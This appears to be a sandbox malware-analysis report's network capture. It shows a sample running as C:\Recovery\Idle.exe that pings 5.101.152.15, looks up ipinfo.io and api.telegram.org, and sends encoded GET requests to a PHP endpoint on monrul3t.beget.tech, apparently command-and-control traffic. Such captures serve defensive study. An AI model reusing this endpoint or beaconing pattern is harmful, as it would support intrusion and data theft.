                                                                                            Jan 11, 2025 18:08:29.827562094 CET5.101.152.15192.168.2.4552fEcho Reply
                                                                                            Jan 11, 2025 18:08:29.827728987 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:08:29.885540009 CET5.101.152.15192.168.2.4552eEcho Reply
                                                                                            Jan 11, 2025 18:08:34.895402908 CET192.168.2.45.101.152.154d2dEcho
                                                                                            Jan 11, 2025 18:08:34.954591990 CET5.101.152.15192.168.2.4552dEcho Reply
                                                                                            Jan 11, 2025 18:08:34.958405018 CET192.168.2.45.101.152.154d2cEcho
                                                                                            Jan 11, 2025 18:08:35.017360926 CET5.101.152.15192.168.2.4552cEcho Reply
                                                                                            Jan 11, 2025 18:08:35.021758080 CET192.168.2.45.101.152.154d2bEcho
                                                                                            Jan 11, 2025 18:08:35.080826044 CET5.101.152.15192.168.2.4552bEcho Reply
                                                                                            Jan 11, 2025 18:08:40.082909107 CET192.168.2.45.101.152.154d2aEcho
                                                                                            Jan 11, 2025 18:08:40.141923904 CET5.101.152.15192.168.2.4552aEcho Reply
                                                                                            Jan 11, 2025 18:08:40.142821074 CET192.168.2.45.101.152.154d29Echo
                                                                                            Jan 11, 2025 18:08:40.202063084 CET5.101.152.15192.168.2.45529Echo Reply
                                                                                            Jan 11, 2025 18:08:40.205601931 CET192.168.2.45.101.152.154d28Echo
                                                                                            Jan 11, 2025 18:08:40.264658928 CET5.101.152.15192.168.2.45528Echo Reply
                                                                                            Jan 11, 2025 18:08:45.273343086 CET192.168.2.45.101.152.154d27Echo
                                                                                            Jan 11, 2025 18:08:45.318011045 CET192.168.2.45.101.152.154d26Echo
                                                                                            Jan 11, 2025 18:08:45.332457066 CET5.101.152.15192.168.2.45527Echo Reply
                                                                                            Jan 11, 2025 18:08:45.333352089 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:08:45.377172947 CET5.101.152.15192.168.2.45526Echo Reply
                                                                                            Jan 11, 2025 18:08:45.378026962 CET192.168.2.45.101.152.154d25Echo
                                                                                            Jan 11, 2025 18:08:45.437207937 CET5.101.152.15192.168.2.45525Echo Reply
                                                                                            Jan 11, 2025 18:08:50.444869995 CET192.168.2.45.101.152.154d24Echo
                                                                                            Jan 11, 2025 18:08:50.503992081 CET5.101.152.15192.168.2.45524Echo Reply
                                                                                            Jan 11, 2025 18:08:50.506608963 CET192.168.2.45.101.152.154d23Echo
                                                                                            Jan 11, 2025 18:08:50.674789906 CET5.101.152.15192.168.2.45523Echo Reply
                                                                                            Jan 11, 2025 18:08:50.709439039 CET192.168.2.45.101.152.154d22Echo
                                                                                            Jan 11, 2025 18:08:50.768511057 CET5.101.152.15192.168.2.45522Echo Reply
                                                                                            Jan 11, 2025 18:08:55.911202908 CET192.168.2.45.101.152.154d21Echo
                                                                                            Jan 11, 2025 18:08:55.970345020 CET5.101.152.15192.168.2.45521Echo Reply
                                                                                            Jan 11, 2025 18:08:55.971473932 CET192.168.2.45.101.152.154d20Echo
                                                                                            Jan 11, 2025 18:08:56.030498981 CET5.101.152.15192.168.2.45520Echo Reply
                                                                                            Jan 11, 2025 18:08:56.035043955 CET192.168.2.45.101.152.154d1fEcho
                                                                                            Jan 11, 2025 18:08:56.094731092 CET5.101.152.15192.168.2.4551fEcho Reply
                                                                                            Jan 11, 2025 18:09:01.098563910 CET192.168.2.45.101.152.154d1eEcho
                                                                                            Jan 11, 2025 18:09:01.157675028 CET5.101.152.15192.168.2.4551eEcho Reply
                                                                                            Jan 11, 2025 18:09:01.159795046 CET192.168.2.45.101.152.154d1dEcho
                                                                                            Jan 11, 2025 18:09:01.218790054 CET5.101.152.15192.168.2.4551dEcho Reply
                                                                                            Jan 11, 2025 18:09:01.221738100 CET192.168.2.45.101.152.154d1cEcho
                                                                                            Jan 11, 2025 18:09:01.280772924 CET5.101.152.15192.168.2.4551cEcho Reply
                                                                                            Jan 11, 2025 18:09:06.286153078 CET192.168.2.45.101.152.154d1bEcho
                                                                                            Jan 11, 2025 18:09:06.317332029 CET192.168.2.45.101.152.154d1aEcho
                                                                                            Jan 11, 2025 18:09:06.345685005 CET5.101.152.15192.168.2.4551bEcho Reply
                                                                                            Jan 11, 2025 18:09:06.345901012 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:09:06.376521111 CET5.101.152.15192.168.2.4551aEcho Reply
                                                                                            Jan 11, 2025 18:09:06.377590895 CET192.168.2.45.101.152.154d19Echo
                                                                                            Jan 11, 2025 18:09:06.436733007 CET5.101.152.15192.168.2.45519Echo Reply
                                                                                            Jan 11, 2025 18:09:11.454615116 CET192.168.2.45.101.152.154d18Echo
                                                                                            Jan 11, 2025 18:09:11.513911009 CET5.101.152.15192.168.2.45518Echo Reply
                                                                                            Jan 11, 2025 18:09:11.552262068 CET192.168.2.45.101.152.154d17Echo
                                                                                            Jan 11, 2025 18:09:11.611351013 CET5.101.152.15192.168.2.45517Echo Reply
                                                                                            Jan 11, 2025 18:09:11.612092018 CET192.168.2.45.101.152.154d16Echo
                                                                                            Jan 11, 2025 18:09:11.671973944 CET5.101.152.15192.168.2.45516Echo Reply
                                                                                            Jan 11, 2025 18:09:16.676913977 CET192.168.2.45.101.152.154d15Echo
                                                                                            Jan 11, 2025 18:09:16.736371994 CET5.101.152.15192.168.2.45515Echo Reply
                                                                                            Jan 11, 2025 18:09:16.737176895 CET192.168.2.45.101.152.154d14Echo
                                                                                            Jan 11, 2025 18:09:16.796300888 CET5.101.152.15192.168.2.45514Echo Reply
                                                                                            Jan 11, 2025 18:09:16.797038078 CET192.168.2.45.101.152.154d13Echo
                                                                                            Jan 11, 2025 18:09:16.856180906 CET5.101.152.15192.168.2.45513Echo Reply
                                                                                            Jan 11, 2025 18:09:16.856244087 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:09:21.833574057 CET192.168.2.45.101.152.154d12Echo
                                                                                            Jan 11, 2025 18:09:21.892611027 CET5.101.152.15192.168.2.45512Echo Reply
                                                                                            Jan 11, 2025 18:09:21.895725965 CET192.168.2.45.101.152.154d11Echo
                                                                                            Jan 11, 2025 18:09:21.955322981 CET5.101.152.15192.168.2.45511Echo Reply
                                                                                            Jan 11, 2025 18:09:21.959803104 CET192.168.2.45.101.152.154d10Echo
                                                                                            Jan 11, 2025 18:09:22.019617081 CET5.101.152.15192.168.2.45510Echo Reply
                                                                                            Jan 11, 2025 18:09:27.036993027 CET192.168.2.45.101.152.154d0fEcho
                                                                                            Jan 11, 2025 18:09:27.096466064 CET5.101.152.15192.168.2.4550fEcho Reply
                                                                                            Jan 11, 2025 18:09:27.107156038 CET192.168.2.45.101.152.154d0eEcho
                                                                                            Jan 11, 2025 18:09:27.166563988 CET5.101.152.15192.168.2.4550eEcho Reply
                                                                                            Jan 11, 2025 18:09:27.169995070 CET192.168.2.45.101.152.154d0dEcho
                                                                                            Jan 11, 2025 18:09:27.229356050 CET5.101.152.15192.168.2.4550dEcho Reply
                                                                                            Jan 11, 2025 18:09:32.239618063 CET192.168.2.45.101.152.154d0cEcho
                                                                                            Jan 11, 2025 18:09:32.298839092 CET5.101.152.15192.168.2.4550cEcho Reply
                                                                                            Jan 11, 2025 18:09:32.300949097 CET192.168.2.45.101.152.154d0bEcho
                                                                                            Jan 11, 2025 18:09:32.333379984 CET192.168.2.45.101.152.154d0aEcho
                                                                                            Jan 11, 2025 18:09:32.359874964 CET5.101.152.15192.168.2.4550bEcho Reply
                                                                                            Jan 11, 2025 18:09:32.359954119 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:09:32.392271996 CET5.101.152.15192.168.2.4550aEcho Reply
                                                                                            Jan 11, 2025 18:09:37.411603928 CET192.168.2.45.101.152.154d09Echo
                                                                                            Jan 11, 2025 18:09:37.470689058 CET5.101.152.15192.168.2.45509Echo Reply
                                                                                            Jan 11, 2025 18:09:37.471771002 CET192.168.2.45.101.152.154d08Echo
                                                                                            Jan 11, 2025 18:09:37.530724049 CET5.101.152.15192.168.2.45508Echo Reply
                                                                                            Jan 11, 2025 18:09:37.531563044 CET192.168.2.45.101.152.154d07Echo
                                                                                            Jan 11, 2025 18:09:37.592391968 CET5.101.152.15192.168.2.45507Echo Reply
                                                                                            Jan 11, 2025 18:09:42.601202011 CET192.168.2.45.101.152.154d06Echo
                                                                                            Jan 11, 2025 18:09:42.661926031 CET5.101.152.15192.168.2.45506Echo Reply
                                                                                            Jan 11, 2025 18:09:42.662825108 CET192.168.2.45.101.152.154d05Echo
                                                                                            Jan 11, 2025 18:09:42.721729040 CET5.101.152.15192.168.2.45505Echo Reply
                                                                                            Jan 11, 2025 18:09:42.726778030 CET192.168.2.45.101.152.154d04Echo
                                                                                            Jan 11, 2025 18:09:42.785722971 CET5.101.152.15192.168.2.45504Echo Reply
                                                                                            Jan 11, 2025 18:09:47.803046942 CET192.168.2.45.101.152.154d03Echo
                                                                                            Jan 11, 2025 18:09:47.822606087 CET192.168.2.45.101.152.154d02Echo
                                                                                            Jan 11, 2025 18:09:47.862062931 CET5.101.152.15192.168.2.45503Echo Reply
                                                                                            Jan 11, 2025 18:09:47.862138033 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:09:47.881551027 CET5.101.152.15192.168.2.45502Echo Reply
                                                                                            Jan 11, 2025 18:09:47.882508993 CET192.168.2.45.101.152.154d01Echo
                                                                                            Jan 11, 2025 18:09:47.941382885 CET5.101.152.15192.168.2.45501Echo Reply
                                                                                            Jan 11, 2025 18:09:52.957916021 CET192.168.2.45.101.152.154d00Echo
                                                                                            Jan 11, 2025 18:09:53.016920090 CET5.101.152.15192.168.2.45500Echo Reply
                                                                                            Jan 11, 2025 18:09:53.026468992 CET192.168.2.45.101.152.154cffEcho
                                                                                            Jan 11, 2025 18:09:53.085470915 CET5.101.152.15192.168.2.454ffEcho Reply
                                                                                            Jan 11, 2025 18:09:53.086389065 CET192.168.2.45.101.152.154cfeEcho
                                                                                            Jan 11, 2025 18:09:53.145340919 CET5.101.152.15192.168.2.454feEcho Reply
                                                                                            Jan 11, 2025 18:09:58.179261923 CET192.168.2.45.101.152.154cfdEcho
                                                                                            Jan 11, 2025 18:09:58.238389015 CET5.101.152.15192.168.2.454fdEcho Reply
                                                                                            Jan 11, 2025 18:09:58.239829063 CET192.168.2.45.101.152.154cfcEcho
                                                                                            Jan 11, 2025 18:09:58.298769951 CET5.101.152.15192.168.2.454fcEcho Reply
                                                                                            Jan 11, 2025 18:09:58.301176071 CET192.168.2.45.101.152.154cfbEcho
                                                                                            Jan 11, 2025 18:09:58.360152006 CET5.101.152.15192.168.2.454fbEcho Reply
                                                                                            Jan 11, 2025 18:09:58.360517979 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:03.333942890 CET192.168.2.45.101.152.154cfaEcho
                                                                                            Jan 11, 2025 18:10:03.393090963 CET5.101.152.15192.168.2.454faEcho Reply
                                                                                            Jan 11, 2025 18:10:03.394000053 CET192.168.2.45.101.152.154cf9Echo
                                                                                            Jan 11, 2025 18:10:03.455032110 CET5.101.152.15192.168.2.454f9Echo Reply
                                                                                            Jan 11, 2025 18:10:03.456343889 CET192.168.2.45.101.152.154cf8Echo
                                                                                            Jan 11, 2025 18:10:03.515460968 CET5.101.152.15192.168.2.454f8Echo Reply
                                                                                            Jan 11, 2025 18:10:08.521392107 CET192.168.2.45.101.152.154cf7Echo
                                                                                            Jan 11, 2025 18:10:08.580693960 CET5.101.152.15192.168.2.454f7Echo Reply
                                                                                            Jan 11, 2025 18:10:08.582808971 CET192.168.2.45.101.152.154cf6Echo
                                                                                            Jan 11, 2025 18:10:08.641887903 CET5.101.152.15192.168.2.454f6Echo Reply
                                                                                            Jan 11, 2025 18:10:08.644474983 CET192.168.2.45.101.152.154cf5Echo
                                                                                            Jan 11, 2025 18:10:08.703452110 CET5.101.152.15192.168.2.454f5Echo Reply
                                                                                            Jan 11, 2025 18:10:13.710447073 CET192.168.2.45.101.152.154cf4Echo
                                                                                            Jan 11, 2025 18:10:13.769650936 CET5.101.152.15192.168.2.454f4Echo Reply
                                                                                            Jan 11, 2025 18:10:13.770922899 CET192.168.2.45.101.152.154cf3Echo
                                                                                            Jan 11, 2025 18:10:13.817329884 CET192.168.2.45.101.152.154cf2Echo
                                                                                            Jan 11, 2025 18:10:13.830260038 CET5.101.152.15192.168.2.454f3Echo Reply
                                                                                            Jan 11, 2025 18:10:13.830337048 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:13.876416922 CET5.101.152.15192.168.2.454f2Echo Reply
                                                                                            Jan 11, 2025 18:10:18.880913973 CET192.168.2.45.101.152.154cf1Echo
                                                                                            Jan 11, 2025 18:10:18.940089941 CET5.101.152.15192.168.2.454f1Echo Reply
                                                                                            Jan 11, 2025 18:10:18.943605900 CET192.168.2.45.101.152.154cf0Echo
                                                                                            Jan 11, 2025 18:10:19.002784014 CET5.101.152.15192.168.2.454f0Echo Reply
                                                                                            Jan 11, 2025 18:10:19.003531933 CET192.168.2.45.101.152.154cefEcho
                                                                                            Jan 11, 2025 18:10:19.062809944 CET5.101.152.15192.168.2.454efEcho Reply
                                                                                            Jan 11, 2025 18:10:24.070004940 CET192.168.2.45.101.152.154ceeEcho
                                                                                            Jan 11, 2025 18:10:24.129622936 CET5.101.152.15192.168.2.454eeEcho Reply
                                                                                            Jan 11, 2025 18:10:24.130702019 CET192.168.2.45.101.152.154cedEcho
                                                                                            Jan 11, 2025 18:10:24.190500975 CET5.101.152.15192.168.2.454edEcho Reply
                                                                                            Jan 11, 2025 18:10:24.191977978 CET192.168.2.45.101.152.154cecEcho
                                                                                            Jan 11, 2025 18:10:24.251033068 CET5.101.152.15192.168.2.454ecEcho Reply
                                                                                            Jan 11, 2025 18:10:29.255100965 CET192.168.2.45.101.152.154cebEcho
                                                                                            Jan 11, 2025 18:10:29.314239979 CET5.101.152.15192.168.2.454ebEcho Reply
                                                                                            Jan 11, 2025 18:10:29.328185081 CET192.168.2.45.101.152.154ceaEcho
                                                                                            Jan 11, 2025 18:10:29.387126923 CET5.101.152.15192.168.2.454eaEcho Reply
                                                                                            Jan 11, 2025 18:10:29.390194893 CET192.168.2.45.101.152.154ce9Echo
                                                                                            Jan 11, 2025 18:10:29.449141026 CET5.101.152.15192.168.2.454e9Echo Reply
                                                                                            Jan 11, 2025 18:10:34.473673105 CET192.168.2.45.101.152.154ce8Echo
                                                                                            Jan 11, 2025 18:10:34.533700943 CET5.101.152.15192.168.2.454e8Echo Reply
                                                                                            Jan 11, 2025 18:10:34.536443949 CET192.168.2.45.101.152.154ce7Echo
                                                                                            Jan 11, 2025 18:10:34.595455885 CET5.101.152.15192.168.2.454e7Echo Reply
                                                                                            Jan 11, 2025 18:10:34.599889040 CET192.168.2.45.101.152.154ce6Echo
                                                                                            Jan 11, 2025 18:10:34.658965111 CET5.101.152.15192.168.2.454e6Echo Reply
                                                                                            Jan 11, 2025 18:10:39.661072969 CET192.168.2.45.101.152.154ce5Echo
                                                                                            Jan 11, 2025 18:10:39.720129013 CET5.101.152.15192.168.2.454e5Echo Reply
                                                                                            Jan 11, 2025 18:10:39.720818043 CET192.168.2.45.101.152.154ce4Echo
                                                                                            Jan 11, 2025 18:10:39.779766083 CET5.101.152.15192.168.2.454e4Echo Reply
                                                                                            Jan 11, 2025 18:10:39.780726910 CET192.168.2.45.101.152.154ce3Echo
                                                                                            Jan 11, 2025 18:10:39.839675903 CET5.101.152.15192.168.2.454e3Echo Reply
                                                                                            Jan 11, 2025 18:10:39.839850903 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:44.833049059 CET192.168.2.45.101.152.154ce2Echo
                                                                                            Jan 11, 2025 18:10:44.892443895 CET5.101.152.15192.168.2.454e2Echo Reply
                                                                                            Jan 11, 2025 18:10:44.895823956 CET192.168.2.45.101.152.154ce1Echo
                                                                                            Jan 11, 2025 18:10:44.954802036 CET5.101.152.15192.168.2.454e1Echo Reply
                                                                                            Jan 11, 2025 18:10:44.955832958 CET192.168.2.45.101.152.154ce0Echo
                                                                                            Jan 11, 2025 18:10:45.015059948 CET5.101.152.15192.168.2.454e0Echo Reply
                                                                                            Jan 11, 2025 18:10:50.020528078 CET192.168.2.45.101.152.154cdfEcho
                                                                                            Jan 11, 2025 18:10:50.079766989 CET5.101.152.15192.168.2.454dfEcho Reply
                                                                                            Jan 11, 2025 18:10:50.081724882 CET192.168.2.45.101.152.154cdeEcho
                                                                                            Jan 11, 2025 18:10:50.141940117 CET5.101.152.15192.168.2.454deEcho Reply
                                                                                            Jan 11, 2025 18:10:50.142971039 CET192.168.2.45.101.152.154cddEcho
                                                                                            Jan 11, 2025 18:10:50.201947927 CET5.101.152.15192.168.2.454ddEcho Reply
                                                                                            Jan 11, 2025 18:10:55.207983971 CET192.168.2.45.101.152.154cdcEcho
                                                                                            Jan 11, 2025 18:10:55.267340899 CET5.101.152.15192.168.2.454dcEcho Reply
                                                                                            Jan 11, 2025 18:10:55.273921013 CET192.168.2.45.101.152.154cdbEcho
                                                                                            Jan 11, 2025 18:10:55.321866989 CET192.168.2.45.101.152.154cdaEcho
                                                                                            Jan 11, 2025 18:10:55.333020926 CET5.101.152.15192.168.2.454dbEcho Reply
                                                                                            Jan 11, 2025 18:10:55.333390951 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:55.381644964 CET5.101.152.15192.168.2.454daEcho Reply
                                                                                            Jan 11, 2025 18:11:00.395750046 CET192.168.2.45.101.152.154cd9Echo
                                                                                            Jan 11, 2025 18:11:00.455275059 CET5.101.152.15192.168.2.454d9Echo Reply
                                                                                            Jan 11, 2025 18:11:00.456269026 CET192.168.2.45.101.152.154cd8Echo
                                                                                            Jan 11, 2025 18:11:00.515583992 CET5.101.152.15192.168.2.454d8Echo Reply
                                                                                            Jan 11, 2025 18:11:00.517815113 CET192.168.2.45.101.152.154cd7Echo
                                                                                            Jan 11, 2025 18:11:00.576800108 CET5.101.152.15192.168.2.454d7Echo Reply

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 11, 2025 18:07:15.762706995 CET192.168.2.41.1.1.10x20c7Standard query (0)monrul3t.beget.techA (IP address)IN (0x0001)false
                                                                                            Jan 11, 2025 18:07:18.003089905 CET192.168.2.41.1.1.10x148dStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                            Jan 11, 2025 18:07:19.340400934 CET192.168.2.41.1.1.10xbd15Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 11, 2025 18:07:15.827383995 CET1.1.1.1192.168.2.40x20c7No error (0)monrul3t.beget.tech5.101.152.15A (IP address)IN (0x0001)false
                                                                                            Jan 11, 2025 18:07:18.010760069 CET1.1.1.1192.168.2.40x148dNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                            Jan 11, 2025 18:07:19.347361088 CET1.1.1.1192.168.2.40xbd15No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • ipinfo.io
                                                                                            • api.telegram.org
                                                                                            • monrul3t.beget.tech

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.4512885.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:15.838148117 CET470OUTGET /c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:07:16.689215899 CET1236INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 2160
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 69 55 54 4d 7a 67 54 59 69 6c 44 4e 6d 64 6a 4e 35 49 44 4f 34 4d 44 5a 6d 4a 7a 4e 77 49 7a 59 7a 55 54 5a 31 4d 6a 4d 68 64 44 4f 69 6f 6a 49 79 59 32 59 34 51 6a 4e 77 55 7a 59 34 63 54 4f 7a 49 54 4e 6d 64 7a 59 35 51 47 4e 6a 42 54 4d 35 49 54 4f 69 4a 47 4e 30 55 6a 49 73 49 69 5a 52 39 32 64 50 6c 6d 53 35 70 46 57 53 6c 6e 57 59 70 56 64 69 42 6a 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 39 55 52 61 56 6c 56 57 6c 7a 63 69 4a 6a 53 30 56 6d 56 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 5a 6b 54 57 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e [TRUNCATED]
                                                                                            Data Ascii: ==QfiUTMzgTYilDNmdjN5IDO4MDZmJzNwIzYzUTZ1MjMhdDOiojIyY2Y4QjNwUzY4cTOzITNmdzY5QGNjBTM5ITOiJGN0UjIsIiZR92dPlmS5pFWSlnWYpVdiBjT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bp9URaVlVWlzciJjS0VmVOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavlmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaSZkTWlkavlmWXJldRNDbqJWbWl3YuZlaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFDbmRmMW9ETxgHaZJDb5p1VxIUSq9WaadVN2VWbWRXYYJlZi1GbuR2V4dnYyYlbJlWQnNUa3lWTElUaPlmS6R2VstWWWpUNZJjR5R2VOpWUXVjdhhlUollM5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkanJTTEFUdOR0Y0lkavlmWXJVMkdEbuJWb5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkaNlXTUNWdNRUUp9UaKxmWIZFMhhlUoJmR5UXYXRWMihkQ2p1VjlWSDF0SMNkSollMslnWXFjQJdEawMWb58USq9WaadVMoRlbSVnWXVDckdUN2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNkSCRVaJZTStZ1aiBjTwIWbWVXYYJVdiJjTmJWbs5GZXh3diJjVulUaBd2QphHbjJDeoplavlmWYJFajxmUCZlbWxGWyUDcaNjVzN2R5wmW5l0ZJF0bz1ERvlmVVZVdhZVO1F2VkFjYIJkdad1Ypl0QBtETDpkeahlUoRmRNdmWHZFMhdVNWlkavlmWXFDaU5Gb5R2R1EjYy4kZi1GbuR2V4dnYyYlbJlWQnNUa3lWVxUVaPlmSsp1R5QUZYpEMi5mV2lVM5UXYXRWMihkQ2
                                                                                            Jan 11, 2025 18:07:16.689258099 CET1171INData Raw: 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 34 31 45 52 56 6c 32 54 70 70 45 62 61 64 55 4f 45 6c 31 56 78 73 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 61 4a 5a 54 53 74 5a 31 61 69 42 6a 54 6f 70 46
                                                                                            Data Ascii: p1VjlWSDF0SMNUS41ERVl2TppEbadUOEl1VxsGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUaJZTStZ1aiBjTopFWKhGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxs2ZkJjVPlkavlmWXFDaU1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJNUQLx0QKpFVplkNJ1mVrJGMOVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1U
                                                                                            Jan 11, 2025 18:07:16.735327005 CET759OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIkJWYmZWM1cTNkRzMhVzMiVWY0MzYwITOjFjNyUGO1kjZwgjMkhTYxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:16.870018005 CET810OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIzMDNhdTO3MmYxIjMmJDOwIDO0MWO3YmZwE2YxQjZzETMjhDO3YmYhJiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:16.963927031 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4f 69 4e 54 4e 33 55 44 4f 32 41 7a 59 35 51 6a 4e 34 55 57 4e 69 4e 6d 59 79 49 47 4d 79 59 6d 4e 31 45 6a 5a 30 4d 44 4d 7a 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6ICOiNTN3UDO2AzY5QjN4UWNiNmYyIGMyYmN1EjZ0MDMzIye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye
                                                                                            Jan 11, 2025 18:07:17.099844933 CET221INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
